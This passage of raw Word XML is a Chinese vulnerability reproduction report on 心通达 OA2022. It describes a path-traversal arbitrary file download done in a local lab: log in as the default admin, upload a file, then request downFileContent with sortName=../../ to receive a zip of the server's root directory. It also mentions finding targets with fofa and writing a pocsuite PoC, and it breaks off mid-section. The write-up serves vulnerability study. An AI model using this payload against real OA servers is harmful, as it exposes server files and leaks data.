            <w:r w:rsidRPr="006376D2"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7A54B7A5" w14:textId="191CC48F" w:rsidR="000E0920" w:rsidRDefault="000E0920" w:rsidP="000E092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376D2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>18532068598</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="30583154" w14:textId="75B5C4D3" w:rsidR="00DB0454" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc19764"/>
      <w:bookmarkStart w:id="14" w:name="_Toc18367"/>
      <w:bookmarkStart w:id="15" w:name="_Toc3137"/>
      <w:r>
        <w:t>2.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞对象</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="594CBA21" w14:textId="5342A225" w:rsidR="005C4358" w:rsidRPr="005C4358" w:rsidRDefault="005C4358" w:rsidP="005C4358">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>心通达</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OA2022</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初夏版，在本地平台测试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC83934" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc33"/>
      <w:bookmarkStart w:id="17" w:name="_Toc5023"/>
      <w:bookmarkStart w:id="18" w:name="_Toc7909"/>
      <w:r>
        <w:t>2.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现阶段</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1852" w:tblpY="341"/>
        <w:tblOverlap w:val="never"/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51"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB0454" w14:paraId="78CC74E7" w14:textId="77777777" w:rsidTr="003A317C">
        <w:trPr>
          <w:trHeight w:val="432"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E47627F" w14:textId="77777777" w:rsidR="00DB0454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7051" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="239A7D7A" w14:textId="77777777" w:rsidR="00DB0454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:rsidR="00DB0454" w14:paraId="4A28CF0D" w14:textId="77777777" w:rsidTr="003A317C">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56ADBBFA" w14:textId="1CF91DF3" w:rsidR="00DB0454" w:rsidRDefault="005C435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lastRenderedPageBreak/>
              <w:t>环境配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7051" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62113B9D" w14:textId="7AB95524" w:rsidR="00DB0454" w:rsidRDefault="005C435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在本地下载</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>心通达</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>OA2022</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>初夏版，配置环境，可以通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:t>27.0.0.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>访问登陆界面表示环境运行成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB0454" w14:paraId="5CB8D8BE" w14:textId="77777777" w:rsidTr="003A317C">
        <w:trPr>
          <w:trHeight w:val="851"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A9BF779" w14:textId="409271C1" w:rsidR="00DB0454" w:rsidRDefault="005C7C4F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文件上传</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7051" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C7196F3" w14:textId="49E76AE3" w:rsidR="00DB0454" w:rsidRDefault="005C7C4F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使用默认用户名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admin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登陆，并在个人文件柜上传名为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.png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的文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB0454" w14:paraId="36777D50" w14:textId="77777777" w:rsidTr="003A317C">
        <w:trPr>
          <w:trHeight w:val="851"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A5FE397" w14:textId="6EFFB11B" w:rsidR="005C7C4F" w:rsidRPr="005C7C4F" w:rsidRDefault="005C7C4F" w:rsidP="005C7C4F">
            <w:pPr>
              <w:pStyle w:val="2"/>
              <w:spacing w:before="156" w:after="156"/>
              <w:ind w:firstLineChars="200" w:firstLine="480"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar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ar"/>
              </w:rPr>
              <w:t>任意文件下载</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7051" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CB8DF35" w14:textId="77777777" w:rsidR="003A317C" w:rsidRDefault="005C7C4F" w:rsidP="003A317C"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 xml:space="preserve">   </w:t>
            </w:r>
            <w:r w:rsidR="003A317C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BAAE748" w14:textId="002B29A1" w:rsidR="00DB0454" w:rsidRPr="003A317C" w:rsidRDefault="00000000" w:rsidP="003A317C">
            <w:hyperlink r:id="rId9" w:history="1">
              <w:r w:rsidR="003A317C">
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:hint="eastAsia"/>
                </w:rPr>
                <w:t>http://127.0.0.1</w:t>
              </w:r>
              <w:r w:rsidR="003A317C">
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                </w:rPr>
                <w:t>:8080/file/downFileContent?contentId=1&amp;sortName=../../</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="003A317C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，得到下载的</w:t>
            </w:r>
            <w:r w:rsidR="003A317C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>zip</w:t>
            </w:r>
            <w:r w:rsidR="003A317C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件，里面为根目录下所有文件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB0454" w14:paraId="140D4EBB" w14:textId="77777777" w:rsidTr="003A317C">
        <w:trPr>
          <w:trHeight w:val="851"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="210F3CD5" w14:textId="56E0FEF2" w:rsidR="00DB0454" w:rsidRDefault="003A317C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编写</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7051" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="609D77E4" w14:textId="43F68D85" w:rsidR="00DB0454" w:rsidRDefault="003A317C" w:rsidP="003A317C"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 xml:space="preserve">   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编写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代码，实现自动漏洞测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB0454" w14:paraId="29090AB3" w14:textId="77777777" w:rsidTr="003A317C">
        <w:trPr>
          <w:trHeight w:val="851"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D921ACC" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB045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7051" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="491AED29" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB045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14:paraId="5AEC2F78" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc29668"/>
      <w:bookmarkStart w:id="20" w:name="_Toc18669"/>
      <w:bookmarkStart w:id="21" w:name="_Toc1860"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>风险等级</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/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651"/>
        <w:gridCol w:w="5721"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB0454" w14:paraId="307B8455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31E60282" w14:textId="77777777" w:rsidR="00DB0454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5FFB0EFD" w14:textId="77777777" w:rsidR="00DB0454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3D7AF0FA" w14:textId="77777777" w:rsidR="00DB0454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:rsidR="00DB0454" w14:paraId="6C5590D3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0D907EBC" w14:textId="77777777" w:rsidR="00DB0454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7B5A9B34" w14:textId="286A66A5" w:rsidR="00DB0454" w:rsidRDefault="003A317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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5721" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E0120D6" w14:textId="18F24CFD" w:rsidR="00DB0454" w:rsidRDefault="003A317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攻击者可以获取服务器内的任意文件，造成数据泄露的隐私问题和更大的服务器安全风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB0454" w14:paraId="026F1A2D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29A1DBC0" w14:textId="77777777" w:rsidR="00DB0454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41781A35" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5721" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="37924BB4" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB0454" w14:paraId="7C439346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7B4BE565" w14:textId="77777777" w:rsidR="00DB0454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651" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29AC449D" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5721" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50D0FB3F" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4775DA24" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454"/>
    <w:p w14:paraId="0F3E7EB5" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454"/>
    <w:p w14:paraId="6B8FA13F" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc6854"/>
      <w:bookmarkStart w:id="23" w:name="_Toc28758"/>
      <w:bookmarkStart w:id="24" w:name="_Toc6133"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现过程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4"/>
    </w:p>
    <w:p w14:paraId="2E0ECD64" w14:textId="77777777" w:rsidR="003A317C" w:rsidRDefault="003A317C" w:rsidP="003A317C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>在本地下载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>心通达</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OA2022</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初夏版，配置环境，可以通过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访问登陆界面表示环境运行成功。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>使用默认用户名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>登陆，并在个人文件柜上传名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>.png</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>的文件。上传成功后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F27AD93" w14:textId="08EA4E46" w:rsidR="00DB0454" w:rsidRDefault="00000000" w:rsidP="003A317C">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="003A317C">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>http://127.0.0.1</w:t>
        </w:r>
        <w:r w:rsidR="003A317C">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>:8080/file/downFileContent?contentId=1&amp;sortName=../../</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003A317C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，得到下载的</w:t>
      </w:r>
      <w:r w:rsidR="003A317C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>zip</w:t>
      </w:r>
      <w:r w:rsidR="003A317C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，里面为根目录下所有文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103AB753" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454"/>
    <w:p w14:paraId="3797A1A0" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc18532"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>风险管理及规避</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="4F2052FD" w14:textId="01354C0F" w:rsidR="00DB0454" w:rsidRDefault="00000000">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000E0920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将环境下载到本地进行实验，不要对线上的运营中的网站进行测试，以免造成信息泄露干扰正常运营。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261C81EA" w14:textId="64D2EDF0" w:rsidR="00DB0454" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc23034"/>
      <w:bookmarkStart w:id="27" w:name="_Toc10352"/>
      <w:bookmarkStart w:id="28" w:name="_Toc4033"/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 w14:paraId="0AFEF8B7" w14:textId="7A2D549D" w:rsidR="005833C7" w:rsidRPr="005833C7" w:rsidRDefault="005833C7" w:rsidP="005833C7">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="005833C7">
        <w:t>fofa.info</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询在线测试子域名，在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指纹平台查询应用指纹。通过在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抓包放包的方式编写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>poc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码，并在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python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pocsuite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境下测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>poc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B13DE6" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc75461104"/>
      <w:bookmarkStart w:id="30" w:name="_Toc28030"/>
      <w:bookmarkStart w:id="31" w:name="_Toc10303"/>
      <w:bookmarkStart w:id="32" w:name="_Toc28445"/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29B48336" w14:textId="77777777" w:rsidR="00E1719F" w:rsidRDefault="00000000" w:rsidP="00E1719F">
      <w:r>
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0023223C" w:rsidRPr="0023223C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抓包工具</w:t>
      </w:r>
      <w:r w:rsidR="0023223C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="0023223C">
        <w:t>Burpsuite v2020.12.</w:t>
      </w:r>
      <w:r w:rsidR="00E1719F">
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BABA4A" w14:textId="77777777" w:rsidR="00E1719F" w:rsidRDefault="00E1719F" w:rsidP="00E1719F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境搭建：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>本地下载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>心通达</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OA2022</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初夏版</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9F6A9F" w14:textId="3C3433F9" w:rsidR="00E1719F" w:rsidRPr="00E1719F" w:rsidRDefault="00E1719F" w:rsidP="00E1719F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境配合</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pocsuite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B675C26" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc11461"/>
      <w:bookmarkStart w:id="34" w:name="_Toc19260"/>
      <w:bookmarkStart w:id="35" w:name="_Toc75461114"/>
      <w:bookmarkStart w:id="36" w:name="_Toc12892"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35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36"/>
    </w:p>
    <w:p w14:paraId="0746E48A" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc32666"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.1 POC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插件编写</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="45BA4797" w14:textId="63303F1B" w:rsidR="00DB0454" w:rsidRPr="00E1719F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00E1719F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:r w:rsidRPr="00E1719F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POC</w:t>
      </w:r>
      <w:r w:rsidRPr="00E1719F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模板</w:t>
      </w:r>
      <w:r w:rsidR="00E1719F" w:rsidRPr="00E1719F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及</w:t>
      </w:r>
      <w:r w:rsidRPr="00E1719F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任意文件读取下载案例模板进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00E1719F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>poc</w:t>
      </w:r>
      <w:r w:rsidRPr="00E1719F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插件编写。</w:t>
      </w:r>
      <w:r w:rsidR="00E1719F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分为三个模块：首先通过抓包放包的方式进行登录，登录成功后，发包找到个人文件柜，上传本地文件</w:t>
      </w:r>
      <w:r w:rsidR="00E1719F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00E1719F">
        <w:t>.png</w:t>
      </w:r>
      <w:r w:rsidR="00E1719F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，根据返回包得到上传成功。上传成功后，发包访问文件下载的</w:t>
      </w:r>
      <w:r w:rsidR="00E1719F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r w:rsidR="00E1719F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，指定参数后会将指定的文件打成压缩包下载，根据返回的数据包中的状态</w:t>
      </w:r>
      <w:r w:rsidR="00E1719F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>attachment</w:t>
      </w:r>
      <w:r w:rsidR="00E1719F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，确定</w:t>
      </w:r>
      <w:r w:rsidR="00E1719F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>poc</w:t>
      </w:r>
      <w:r w:rsidR="00E1719F">
